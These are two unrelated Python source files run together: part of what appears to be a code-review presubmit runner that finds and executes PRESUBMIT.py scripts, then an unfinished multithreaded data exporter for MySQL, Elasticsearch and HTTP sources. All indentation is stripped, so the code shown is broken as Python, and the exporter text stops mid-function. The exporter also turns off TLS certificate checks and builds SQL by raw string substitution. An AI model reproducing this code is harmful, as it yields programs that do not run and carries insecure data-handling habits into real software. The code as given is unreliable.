if not re.match(r'^[A-Z_]*$', attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def GitFootersFromDescription(self):
"""Return the git footers present in the description.
Returns:
footers: A dict of {footer: [values]} containing a multimap of the footers
in the change description.
"""
return git_footers.parse_footers(self.FullDescriptionText())
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
parsed = self.GitFootersFromDescription()
unsplit_footers = parsed.get('Bug', []) + parsed.get('Fixed', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a 'R:' git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(crbug.com/839208): Remove support for 'Tbr:' when TBRs are
# programmatically determined by self-CR+1s.
footers = self.GitFootersFromDescription().get('Tbr', [])
return sorted(set(tags + footers))
# TODO(crbug.com/753425): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = list(filter(file_filter, self._affected_files))
if include_deletes:
return affected
return list(filter(lambda x: x.Action() != 'D', affected))
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in 'new' version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
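# Illustrative sketch, not part of the original module: with root '/repo' and
# files ['a/b/c.cc', 'd/e.cc'], the candidate directories are /repo/a/b,
# /repo/a, /repo/d and /repo itself, and every PRESUBMIT*.py found in them
# (excluding PRESUBMIT_test* scripts) is returned as an absolute path.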
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, gerrit_obj, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
gerrit_obj: The GerritAccessor object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(gerrit_obj, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.items(),
masters2.items()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.items():
new_builders.setdefault(builder, set([])).update(tests)
return result
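# Illustrative sketch, not part of the original module:
#   _MergeMasters({'m1': {'b1': {'t1'}}}, {'m1': {'b1': {'t2'}, 'b2': set()}})
# returns {'m1': {'b1': {'t1', 't2'}, 'b2': set()}}: builders are merged per
# master and their test sets are unioned.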
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write('Warning, no PRESUBMIT.py found.\n')
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write('Running default presubmit script.\n')
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.values():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
gerrit_obj,
verbose):
"""Execute the post upload hook.
Args:
change: The Change object.
gerrit_obj: The GerritAccessor object.
verbose: Prints debug info.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, gerrit_obj, change))
if not results:
return 0
sys.stdout.write('\n')
sys.stdout.write('** Post Upload Hook Messages **\n')
exit_code = 0
for result in results:
if result.fatal:
exit_code = 1
result.handle()
sys.stdout.write('\n')
return exit_code
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None,
thread_pool=None, parallel=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
presubmit_dir = os.path.dirname(presubmit_path)
os.chdir(presubmit_dir)
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
# Try to figure out whether these presubmit checks should be run under
# python2 or python3. We need to do this without actually trying to
# compile the text, since the text might compile in one but not the
# other.
m = re.search('^USE_PYTHON3 = True$', script_text, flags=re.MULTILINE)
use_python3 = m is not None
if (((sys.version_info.major == 2) and use_python3) or
((sys.version_info.major == 3) and not use_python3)):
return []
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
context['__args'] = (input_api, output_api)
# Get path of presubmit directory relative to repository root.
# Always use forward slashes, so that path is same in *nix and Windows
root = input_api.change.RepositoryRoot()
rel_path = os.path.relpath(presubmit_dir, root)
rel_path = rel_path.replace(os.path.sep, '/')
# Get the URL of git remote origin and use it to identify host and project
host = project = ''
if self.gerrit:
host = self.gerrit.host or ''
project = self.gerrit.project or ''
# Prefix for test names
prefix = 'presubmit:%s/%s:%s/' % (host, project, rel_path)
# Perform all the desired presubmit checks.
results = []
try:
version = [
int(x) for x in context.get('PRESUBMIT_VERSION', '0.0.0').split('.')
]
with rdb_wrapper.client(prefix) as sink:
if version >= [2, 0, 0]:
for function_name in context:
if not function_name.startswith('Check'):
continue
if function_name.endswith('Commit') and not self.committing:
continue
if function_name.endswith('Upload') and self.committing:
continue
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
else: # Old format
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
logging.debug('Running %s in %s', function_name, presubmit_path)
results.extend(
self._run_check_function(function_name, context, sink))
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
for f in input_api._named_temporary_files:
os.remove(f)
# Return the process to the original working directory.
os.chdir(main_path)
return results
def _run_check_function(self, function_name, context, sink=None):
"""Evaluates and returns the result of a given presubmit function.
If sink is given, the result of the presubmit function will be reported
to the ResultSink.
Args:
function_name: the name of the presubmit function to evaluate
context: a context dictionary in which the function will be evaluated
sink: an instance of ResultSink. None, by default.
Returns:
the result of the presubmit function call.
"""
start_time = time_time()
try:
result = eval(function_name + '(*__args)', context)
self._check_result_type(result)
except Exception:
if sink:
elapsed_time = time_time() - start_time
sink.report(function_name, rdb_wrapper.STATUS_FAIL, elapsed_time)
# TODO(crbug.com/953884): replace reraise with native py3:
# raise .. from e
e_type, e_value, e_tb = sys.exc_info()
print('Evaluation of %s failed: %s' % (function_name, e_value))
six.reraise(e_type, e_value, e_tb)
elapsed_time = time_time() - start_time
if elapsed_time > 10.0:
sys.stdout.write(
'%s took %.1fs to run.\n' % (function_name, elapsed_time))
if sink:
status = rdb_wrapper.STATUS_PASS
if any(r.fatal for r in result):
status = rdb_wrapper.STATUS_FAIL
sink.report(function_name, status, elapsed_time)
return result
def _check_result_type(self, result):
"""Helper function which ensures result is a list, and all elements are
instances of OutputApi.PresubmitResult"""
if not isinstance(result, (tuple, list)):
raise PresubmitFailure('Presubmit functions must return a tuple or list')
if not all(isinstance(res, OutputApi.PresubmitResult) for res in result):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
def DoPresubmitChecks(change,
committing,
verbose,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Return:
1 if presubmit checks failed or 0 otherwise.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
python_version = 'Python %s' % sys.version_info.major
if committing:
sys.stdout.write('Running %s presubmit commit checks ...\n' %
python_version)
else:
sys.stdout.write('Running %s presubmit upload checks ...\n' %
python_version)
start_time = time_time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
sys.stdout.write('Warning, no PRESUBMIT.py found.\n')
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel)
if default_presubmit:
if verbose:
sys.stdout.write('Running default presubmit script.\n')
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
sys.stdout.write('Running %s\n' % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
messages = {}
should_prompt = False
presubmits_failed = False
for result in results:
if result.fatal:
presubmits_failed = True
messages.setdefault('ERRORS', []).append(result)
elif result.should_prompt:
should_prompt = True
messages.setdefault('Warnings', []).append(result)
else:
messages.setdefault('Messages', []).append(result)
sys.stdout.write('\n')
for name, items in messages.items():
sys.stdout.write('** Presubmit %s **\n' % name)
for item in items:
item.handle()
sys.stdout.write('\n')
total_time = time_time() - start_time
if total_time > 1.0:
sys.stdout.write(
'Presubmit checks took %.1fs to calculate.\n\n' % total_time)
if not should_prompt and not presubmits_failed:
sys.stdout.write('%s presubmit checks passed.\n' % python_version)
elif should_prompt:
sys.stdout.write('There were %s presubmit warnings. ' % python_version)
if may_prompt:
presubmits_failed = not prompt_should_continue(
'Are you sure you wish to continue? (y/N): ')
else:
sys.stdout.write('\n')
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format()
for error in messages.get('ERRORS', [])
],
'notifications': [
notification.json_format()
for notification in messages.get('Messages', [])
],
'warnings': [
warning.json_format()
for warning in messages.get('Warnings', [])
],
'more_cc': executer.more_cc,
}
gclient_utils.FileWrite(
json_output, json.dumps(presubmit_results, sort_keys=True))
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
sys.stdout.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return 1 if presubmits_failed else 0
finally:
os.environ = old_environ
def _scan_sub_dirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def _parse_files(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in _scan_sub_dirs(arg, recursive)])
return files
def _parse_change(parser, options):
"""Process change options.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GitChange if the change root is a git repository, or a Change otherwise.
"""
if options.files and options.all_files:
parser.error('<files> cannot be specified when --all-files is set.')
change_scm = scm.determine_scm(options.root)
if change_scm != 'git' and not options.files:
parser.error('<files> is not optional for unversioned directories.')
if options.files:
change_files = _parse_files(options.files, options.recursive)
elif options.all_files:
change_files = [('M', f) for f in scm.GIT.GetAllFiles(options.root)]
else:
change_files = scm.GIT.CaptureStatus(
options.root, options.upstream or None)
logging.info('Found %d file(s).', len(change_files))
change_class = GitChange if change_scm == 'git' else Change
return change_class(
options.name,
options.description,
options.root,
change_files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream)
def _parse_gerrit_options(parser, options):
"""Process gerrit options.
SIDE EFFECTS: Modifies options.author and options.description from Gerrit if
options.gerrit_fetch is set.
Args:
parser: The parser used to parse the arguments from command line.
options: The arguments parsed from command line.
Returns:
A GerritAccessor object if options.gerrit_url is set, or None otherwise.
"""
gerrit_obj = None
if options.gerrit_url:
gerrit_obj = GerritAccessor(
url=options.gerrit_url,
project=options.gerrit_project,
branch=options.gerrit_branch)
if not options.gerrit_fetch:
return gerrit_obj
if not options.gerrit_url or not options.issue or not options.patchset:
parser.error(
'--gerrit_fetch requires --gerrit_url, --issue and --patchset.')
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(
options.issue, options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
return gerrit_obj
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warning('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.items():
setattr(presubmit_canned_checks, name, method)
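# Illustrative sketch, not part of the original module (the check name is an
# assumption; any attribute of presubmit_canned_checks is handled the same):
#   with canned_check_filter(['CheckOwners']):
#     ...  # presubmit_canned_checks.CheckOwners is a no-op inside this block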
def main(argv=None):
parser = argparse.ArgumentParser(usage='%(prog)s [options] <files...>')
hooks = parser.add_mutually_exclusive_group()
hooks.add_argument('-c', '--commit', action='store_true',
help='Use commit instead of upload checks.')
hooks.add_argument('-u', '--upload', action='store_false', dest='commit',
help='Use upload instead of commit checks.')
hooks.add_argument('--post_upload', action='store_true',
help='Run post-upload commit hooks.')
parser.add_argument('-r', '--recursive', action='store_true',
help='Act recursively.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Use 2 times for more debug info.')
parser.add_argument('--name', default='no name')
parser.add_argument('--author')
desc = parser.add_mutually_exclusive_group()
desc.add_argument('--description', default='', help='The change description.')
desc.add_argument('--description_file',
help='File to read change description from.')
parser.add_argument('--issue', type=int, default=0)
parser.add_argument('--patchset', type=int, default=0)
parser.add_argument('--root', default=os.getcwd(),
help='Search for PRESUBMIT.py up to this directory. '
'If inherit-review-settings-ok is present in this '
'directory, parent directories up to the root file '
'system directories will also be searched.')
parser.add_argument('--upstream',
help='Git only: the base ref or upstream branch against '
'which the diff should be computed.')
parser.add_argument('--default_presubmit')
parser.add_argument('--may_prompt', action='store_true', default=False)
parser.add_argument('--skip_canned', action='append', default=[],
help='A list of checks to skip which appear in '
'presubmit_canned_checks. Can be provided multiple times '
'to skip multiple canned checks.')
parser.add_argument('--dry_run', action='store_true', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_url', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_project', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_branch', help=argparse.SUPPRESS)
parser.add_argument('--gerrit_fetch', action='store_true',
help=argparse.SUPPRESS)
parser.add_argument('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in '
'all PRESUBMIT files in parallel.')
parser.add_argument('--json_output',
help='Write presubmit errors to json output.')
parser.add_argument('--all_files', action='store_true',
help='Mark all files under source control as modified.')
parser.add_argument('files', nargs='*',
help='List of files to be marked as modified when '
'executing presubmit or post-upload hooks. fnmatch '
'wildcards can also be used.')
options = parser.parse_args(argv)
log_level = logging.ERROR
if options.verbose >= 2:
log_level = logging.DEBUG
elif options.verbose:
log_level = logging.INFO
log_format = ('[%(levelname).1s%(asctime)s %(process)d %(thread)d '
'%(filename)s] %(message)s')
logging.basicConfig(format=log_format, level=log_level)
if options.description_file:
options.description = gclient_utils.FileRead(options.description_file)
gerrit_obj = _parse_gerrit_options(parser, options)
change = _parse_change(parser, options)
try:
if options.post_upload:
return DoPostUploadExecuter(
change,
gerrit_obj,
options.verbose)
with canned_check_filter(options.skip_canned):
return DoPresubmitChecks(
change,
options.commit,
options.verbose,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output)
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
Exporter.py
|
# -*- coding:utf-8 -*-
__all__ = ['Exporter']
import sys, os, threading,math,traceback,gc,json,re,time
import requests,pymysql,xlsxwriter
from pymysql.cursors import DictCursor
from lib.Base import Base
class Exporter(Base):
rootPath = os.path.dirname(os.path.realpath(sys.argv[0]))
tmpPath = rootPath + '/tmp'
dataDir = tmpPath + '/export-data'
dataPath = dataDir + '/page-{page}.csv'
dataInfoDir = tmpPath + '/export-info'
dataInfoPath = dataInfoDir + '/page-{page}.json'
taskInfoPath = dataInfoDir + '/task.json'
errorLogPath = dataInfoDir + '/error.log'
db_list = []
threadList = []
cfg = {}
def __init__(self, inited=True):
super().__init__(inited)
#print('exporter __init__')
def parent(self):
return super()
def init(self):
super().init()
#print('exporter init')
try:
if not os.path.exists(self.dataDir):
os.mkdir(self.dataDir)
if not os.path.exists(self.dataInfoDir):
os.mkdir(self.dataInfoDir)
except:
traceback.print_exc()
self.log('Cannot create [/export-data] or [/export-info] path.', ['exit', None])
def loadConfig(self):
super().loadConfig()
self.cfg = self.config['Export'] if self.config else None
#extract
if self.cfg and self.cfg[self.cfg['extractSection']]:
for k, v in self.cfg[self.cfg['extractSection']].items():
self.cfg[k] = v
return self.cfg
'''
def log(self, str, extra=None):
#print('----------------------', end="\n")
#print(str, end="\n")
pass
'''
def __del__(self):
self.closeConnect()
def getMysqlData(self, sql, page):
if len(self.db_list) < 1:
self.db_list.append(None)
try:
self.db_list[page - 1] = pymysql.connect(
host=self.cfg['host'],
port=self.cfg['port'],
user=self.cfg['user'],
password=self.cfg['password'],
database=self.cfg['database'],
charset=self.cfg['charset'],
connect_timeout=self.cfg['connectTimeout']
)
#self.db_list[page - 1].ping(reconnect=True)
cursor = self.db_list[page - 1].cursor(DictCursor)
cursor.execute(sql)
results = cursor.fetchall()
#gc
self.db_list[page - 1].close()
self.db_list[page - 1] = None
del cursor
gc.collect()
return results
except Exception as e:
self.log('The page %d mysql data cannot be fetched, Sql: %s, Error: %s' % (page, sql, e.__str__()), ['error', None])
return None
def getElasticsearchData(self, query, page):
headers = json.loads(self.cfg['headers']) if self.cfg['headers'] else {}
cookies = json.loads(self.cfg['cookies']) if self.cfg['cookies'] else {}
try:
response = requests.post(self.cfg['url'], data=query, timeout=self.cfg['connectTimeout'], headers=headers, cookies=cookies, verify=False)
except Exception as e:
response = None
self.log('The page %d request failed, HTTP Error: %s' % (page, e.__str__()), ['error', None])
if response == None or response.status_code != 200:
self.log('The page %d request failed, Error: %s' % (page, 'None' if response == None else response.text), ['error', None])
return None
#print(response.text)
try:
content = json.loads(response.text)
except Exception as e:
self.log('The page %d json data failed to parse, Error: %s' % (page, e.__str__()), ['error', None])
return None
ret = []
for item in content['hits']['hits']:
ret.append(dict({"_index":item['_index'],"_type":item['_type'],"_id":item['_id']}, **item['_source']))
#print(ret)
#gc
del content
del response
return ret
def getHttpFile(self, sql, page):
headers = json.loads(self.cfg['headers']) if self.cfg['headers'] else {}
cookies = json.loads(self.cfg['cookies']) if self.cfg['cookies'] else {}
try:
response = requests.post(self.cfg['url'], data=sql, timeout=self.cfg['connectTimeout'], headers=headers, cookies=cookies, verify=False)
except Exception as e:
response = None
self.log('The page %d request hit an HTTP error: %s' % (page, e.__str__()), ['error', None])
if response == None or response.status_code != 200:
self.log('The page %d request failed, Error: %s' % (page, 'None' if response == None else response.text), ['error', None])
return None
content = response.content.decode()
r = re.match(r'^(\d+)\n.*', content)
total = int(r[1])
return {"total": total, "content": content[len(r[1])+1:]}
def fetchData(self, sql, page):
if self.cfg['driver'] == 'mysql':
return self.getMysqlData(sql, page)
elif self.cfg['driver'] == 'elasticsearch':
return self.getElasticsearchData(sql, page)
elif self.cfg['driver'] == 'http-file':
return self.getHttpFile(sql, page)
def closeConnect(self):
for i in self.db_list:
if i and not i._closed:
i.close()
def stopTask(self):
self.taskStatus = -1
self.closeConnect()
gc.collect()
def runTask(self, resumeRun=False, loopRun=False):
self.loadConfig()
if not resumeRun:
self.log('Start clearing export data dir...')
self.clearDir(self.dataDir)
self.log('Start clearing export info dir...')
self.clearDir(self.dataInfoDir)
gc.collect()
self.threadList.clear()
self.threadLock = threading.Semaphore(self.cfg['maxThreadNum'])
self.taskStatus = 1
self.taskFinished = -1 if self.isLoopTask() else 0
totalPage = self.getTotalPage()
self.log('Start running export task...')
#thread
for i in range(1, totalPage + 1):
self.db_list.append(None)
#start
if not self.isLoopTask() and os.path.exists(self.dataInfoPath.format(page=i)):
self.taskFinished += 1
elif self.isLoopTask() and i <= self.getTaskInfo()['page']:
self.taskFinished += 1
else:
t = threading.Thread(target=self.exportData,args=(i, self.getTaskInfo()['end']+1 if self.isLoopTask() else None))
self.threadList.append(t)
#start thread
for v in self.threadList:
k = v._args[0]
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted without starting' % k)
break
self.threadLock.acquire()
v.start()
self.log('Thread export-%d has started.' % k, ['progress', self.getProgress('progress')])
self.log('All %d threads have been started' % len(self.threadList))
for (k, v) in enumerate(self.threadList):
if self.taskStatus < 0:
self.log('Thread-%d has been interrupted without ending' % (k+1))
break
v.join()
self.log('Thread-%d has finished' % (k+1), ['progress', self.getProgress('progress')])
#finish
if self.taskStatus == 1:
self.taskStatus = 0
self.threadList.clear()
gc.collect()
#loop
if loopRun and self.taskStatus>=0 and self.taskFinished<totalPage:
self.log('Loop to run export task...')
time.sleep(self.cfg['loopSleepTime'])
if self.taskStatus>=0:
self.runTask(True, True)
else:
self.log('Export task has finished', ['end', self.getProgress('end')])
def parseSQL(self, sql, page, s, e):
sql = sql.replace('{start}',str(s))
sql = sql.replace('{end}',str(e))
sql = sql.replace('{page}',str(page))
sql = sql.replace('{offset}',str((page-1) * self.cfg['pageSize']))
sql = sql.replace('{size}',str(self.cfg['pageSize']))
return sql
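# Illustrative sketch, not part of the original class: with pageSize=1000,
#   self.parseSQL('SELECT * FROM t LIMIT {offset},{size}', page=3, s=2000, e=3000)
# returns 'SELECT * FROM t LIMIT 2000,1000', since {offset} expands to
# (page-1)*pageSize and {size} to pageSize; {start}, {end} and {page} expand
# to the raw values passed in.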
def exportData(self, page, startLine=None):
if self.taskStatus < 0:
self.log('Thread export-%d has been interrupted' % page)
self.threadLock and self.threadLock.release()
return
totalPage = self.getTotalPage()
self.log('Exporting the page %d, total %d pages...' % (page, totalPage))
if self.isLoopTask():
s = startLine
e = s + self.cfg['pageSize']
else:
s = (page - 1) * self.cfg['pageSize'] + self.cfg['startLine']
e = s + self.cfg['pageSize']
e = self.cfg['endLine'] if e > self.cfg['endLine'] else e
#last page
if page >= totalPage:
e = e + 1
sql = self.parseSQL(self.cfg['sql'], page, s, e)
self.log(sql)
d = self.fetchData(sql, page)
#print(d)
if self.cfg['driver'] == 'http-file':
if self.isLoopTask() :
if d and d["total"] > 0:
